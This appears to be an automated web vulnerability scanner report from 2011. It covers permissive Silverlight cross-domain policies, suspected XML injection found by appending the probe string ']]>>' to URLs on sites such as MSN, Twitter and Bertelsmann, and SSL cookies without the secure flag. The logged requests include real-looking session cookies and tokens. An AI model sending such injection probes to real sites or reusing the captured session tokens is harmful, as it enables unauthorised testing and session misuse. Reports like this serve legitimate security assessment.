Last-Modified: Fri, 18 Mar 2011 23:41:08 GMT
Accept-Ranges: bytes
ETag: "024af4c5e5cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:16 GMT
Connection: keep-alive
Content-Length: 337
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com
Response
HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Mon, 02 May 2011 08:07:20 GMT
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: api.bing.com
Response
HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 348
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 26 Apr 2011 18:36:37 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-04-26T18%3a36%3a36; expires=Fri, 06-May-2011 18:36:36 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=50545F5A8928421BB01BB0B19336B7AC; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1744956&MS=1744956; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=FEBA9C7121224C53B980FC7F5CE2D208; expires=Thu, 25-Apr-2013 18:36:36 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110426; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/
The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: data.moneycentral.msn.com
Response
HTTP/1.1 200 OK
Content-Length: 2066
Content-Type: text/xml
Last-Modified: Fri, 08 Apr 2011 00:17:04 GMT
Accept-Ranges: bytes
ETag: "2eb2dc4982f5cb1:6fa2"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:17 GMT
Connection: close
The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: money.msn.com
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Last-Modified: Wed, 08 Dec 2010 00:00:36 GMT
ETag: "5fc3edf06a96cb1:803"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:34 GMT
Connection: keep-alive
Content-Length: 706
The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: moneycentral.msn.com
Response
HTTP/1.1 200 OK
Content-Length: 821
Content-Type: text/xml
Last-Modified: Thu, 07 Apr 2011 22:00:07 GMT
Accept-Ranges: bytes
ETag: "6d6573286ff5cb1:168f5"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close
The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: services.money.msn.com
Response
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 29 Mar 2011 23:21:38 GMT
Accept-Ranges: bytes
ETag: "06d75d68eecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close
Content-Length: 649
<input value="" type="password" title="Your password is case sensitive and must be between 4 and 25 characters long." style="width:142px;" name="/atg/userprofiling/ProfileFormHandler.value.password"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.password"> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /favicon.ico]]>> HTTP/1.1
Host: freemanco.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:08:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1053
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /anywhere.js]]>>?id=3VXxrl7e9B3f66ejq9xow&v=1&ver=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550
Response
HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 280
Date: Tue, 26 Apr 2011 21:03:24 GMT
Connection: close
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>anywhere.js]]>></Key><RequestId>43A34E986909F87A</RequestId><HostId>d ...[SNIP]...
The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /quoteservice/streaming?format=json]]>>&symbol=EURUSD,%20GBPUSD,%20USDJPY,&callback=jsonp1303842964760 HTTP/1.1
Host: services.money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/market-news/default.aspx?feat=2f32cfe1-809c-4c94-91ed-3e58746880aa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37
<?xml version="1.0" encoding="utf-8"?><root><result><DynamicSymbology><Symbol>EURUSD</Symbol><CompanyName>Euro to US Dollar</CompanyName><Country>US</Country><Type>CurrencyExchange</Type></DynamicSymb ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /k]]>>/bpi7eqn-e.css?3bb2a6e53c9684ffdc9a9bf1135b2a62ecbeaca761fbe87f15aec123ab5093d026e6e1bb0d1ae7cef0cb4486ee99fc9c314d37b0c3e12286285b50bf357d600e4ecf2b4738aa7af9c135b2c105695ad3dd623449abf994d967461f6b4da1162454ed7f3aa00e56b7b2be79831a77ecd09428a672695e1a56a6d92392e4138295c64b8e8e4674fd339a538359c9fa05ea31d66dd5d81e07aa24a5916f02c4dfc3ff68716d18da38b53004367a7a6a526281673d HTTP/1.1 Host: use.typekit.com Proxy-Connection: keep-alive Referer: http://moxieinsight.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Cache-Control: max-age=300 Content-Type: text/html Date: Tue, 26 Apr 2011 21:07:13 GMT Expires: Tue, 26 Apr 2011 21:12:13 GMT Server: EOS (lax001/54D6) Content-Length: 345
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /k/bpi7eqn-e.css]]>>?3bb2a6e53c9684ffdc9a9bf1135b2a62ecbeaca761fbe87f15aec123ab5093d026e6e1bb0d1ae7cef0cb4486ee99fc9c314d37b0c3e12286285b50bf357d600e4ecf2b4738aa7af9c135b2c105695ad3dd623449abf994d967461f6b4da1162454ed7f3aa00e56b7b2be79831a77ecd09428a672695e1a56a6d92392e4138295c64b8e8e4674fd339a538359c9fa05ea31d66dd5d81e07aa24a5916f02c4dfc3ff68716d18da38b53004367a7a6a526281673d HTTP/1.1 Host: use.typekit.com Proxy-Connection: keep-alive Referer: http://moxieinsight.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Cache-Control: max-age=300 Content-Type: text/html Date: Tue, 26 Apr 2011 21:07:17 GMT Expires: Tue, 26 Apr 2011 21:12:17 GMT Server: EOS (lax001/54E5) Content-Length: 345
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /bertelsmann_corp]]>>/wms41/xml/headerflash_config.xml.php?id=96|en|1303856364 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:41:16 GMT Server: Apache/2.2.15 (Fedora) Content-Length: 261 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /bertelsmann_corp]]>>/wms41/xml/headerflash_config.xml.php was not found on this server.</p> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /bertelsmann_corp/wms41]]>>/xml/headerflash_config.xml.php?id=96|en|1303856364 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:41:23 GMT Server: Apache/2.2.15 (Fedora) Content-Length: 261 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /bertelsmann_corp/wms41]]>>/xml/headerflash_config.xml.php was not found on this server.</p> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /bertelsmann_corp/wms41/xml]]>>/headerflash_config.xml.php?id=96|en|1303856364 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:41:29 GMT Server: Apache/2.2.15 (Fedora) Content-Length: 261 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /bertelsmann_corp/wms41/xml]]>>/headerflash_config.xml.php was not found on this server.</p> ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /bertelsmann_corp/wms41/xml/headerflash_config.xml.php]]>>?id=96|en|1303856364 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:41:35 GMT Server: Apache/2.2.15 (Fedora) Content-Length: 261 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /bertelsmann_corp/wms41/xml/headerflash_config.xml.php]]>> was not found on this server.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /freemanco]]>>?fs=true&_requestid=118715 HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:13:05 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1184
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /freemanco]]>>/?fs=true&_requestid=118715 HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:11:20 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1184
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:50:15 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1268
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:51:21 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1057
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /store]]>>?from=freemanco HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:13:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1184
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /store]]>>/?from=freemanco HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:13:02 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1184
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:13:32 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1268
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
10. SSL cookie without secure flag set
There are 15 instances of this issue:
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /s.nl?c=1142057&n=1&sc=4&ck=rcHW8655AeSHwA-v&vid=rcHW8655Ac-HwJur&cktime=96686&cart=776158&gc=clear&ext=F&whence= HTTP/1.1 Host: checkout.netsuite.com Connection: keep-alive Referer: http://www.magellangps.com/s.nl?sc=3&whence=&custcol_celigo_serialno= Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken= HTTP/1.1 Host: myaccount.west.thomson.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; 